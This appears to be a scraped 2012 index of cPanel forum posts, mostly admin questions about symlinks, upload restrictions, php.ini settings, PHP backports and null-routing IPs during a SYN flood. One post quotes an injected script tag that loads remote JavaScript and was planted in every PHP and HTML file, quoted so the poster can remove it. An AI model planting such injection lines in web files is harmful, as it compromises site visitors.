[Cpanel Blog] symlinks to files not owned by the user July,2012

What do I need to enable in cpanel to prevent users from creating symlinks to files they dont own?
symlinks to files not owned by the user
[Cpanel Blog] Add new User or what May,2012

[Cpanel Blog] How to set retraction on uploading file type or extensions? July,2012

Hi,

I want to limit only files with approved extensions such as ".gif", ".jpeg", ".doc", etc. are allowed to be uploaded to the web server. This is vitally important for my server's security, since the web server might attempt to execute or specially process files with extensions like ".php", ".cgi", etc.

Anybody can advice how and where can I set / configure to set restriction to upload file according to below Logic:

# Deny All File extension
# Except : .gif , .jpg , .pdf , .png.

Any help is highly appreciated.
How to set retraction on uploading file type or extensions?
[Cpanel Blog] Incomplete SSL Chain problem in Firefox June,2012

[Cpanel Blog] disable special php.ini features with suexec June,2012

Hi,

we are using suexec in order to provide each customer with an own php.ini; is there any possibility to prevent the customers from setting safe_mode to off in their php.ini?

Kind regards,
Christian
disable special php.ini features with suexec
Cpanel Blog Installing a UCC SSL Cert May,2012

[Cpanel Blog] php 5.2.17 security backports question June,2012

Hello,

I run the default apache (2.2.22) and php installation (5.2.17) and installed using easyapache through cpanel/WHM.

Secunia dot com released several security vulnerability notifications today that affect php 5.3x and 5.4x (and presumably 5.2x as well but I could be wrong).

Some of these vulnerabilities were reported today and others about a month ago. Have they already been backported to php 5.2.17 by the cpanel team when installed using easyapache? If not, will they? Or is the only choice to upgrade to the latest version of php 5.3x or 5.4x to be protected against these latest vulnerabilities?

We run many websites and unfortunately trying to get the web developers to update their code to work with php 5.3x and newer is a PITA. I'd still like to run php 5.2x but not if it's going to lead to the server getting rooted through arbitrary code execution vulnerabilities in php 5.2x.

Any info or tips are greatly appreciated.

Thank you!

secunia dot com/advisories/49731/ (cve's listed here)
secunia dot com/advisories/49014/ (cves listed here)
php 5.2.17 security backports question
Cpanel Blog Strange email with attachment from "cpanel" May,2012

[Cpanel Blog] Using PHP to add a custom security policy June,2012

Hi, I just read http://www.cpanel.net/secpolicy.pdf
I was wondering if it's possible to add a custom security policy using PHP?
The PDF seems to mention Perl only.
Using PHP to add a custom security policy
[Cpanel Blog] Share your Mod Security configuration May,2012

[Cpanel Blog] security problem, php and html files vulnerability June,2012

from 2 days I have a problem with some accounts on my some vps with cpanel.

I must find and replace specific string in all accounts, I find in all files php and html on some ftp root this:

<script type="text/javascript" src="http://domainname.com/wp-content/uploads/process.js"></script>

in first line for every file and I must run a conbination od find and sed command for remove it
security problem, php and html files vulnerability
Cpanel Blog can't access our website May,2012

[Cpanel Blog] How can I temporarily NULL ROUTE one of my own IPs? June,2012

I am getting hit by a DDOS SYN FLOOD attack on a couple of currently unused IPs that have been configured on my server.

I just want to remove these IPs temporarily, so that no response (e.g. from Apache) is sent out to the remotely connecting IP.

I know I can have my data center NULL ROUTE these IPs for me, but I would rather just do it myself via shell, or in WHM.

Can this be easily accomplished?

Yes, we have CSF and the SYNFLOOD protections switched on, but at this point I would rather just pull the IPs for a while.

By the way, they are hitting port 443 rather than port 80 for some reason.

Thanks for any ideas here!
How can I temporarily NULL ROUTE one of my own IPs?
[Cpanel Blog] Security bug in cPanel login May,2012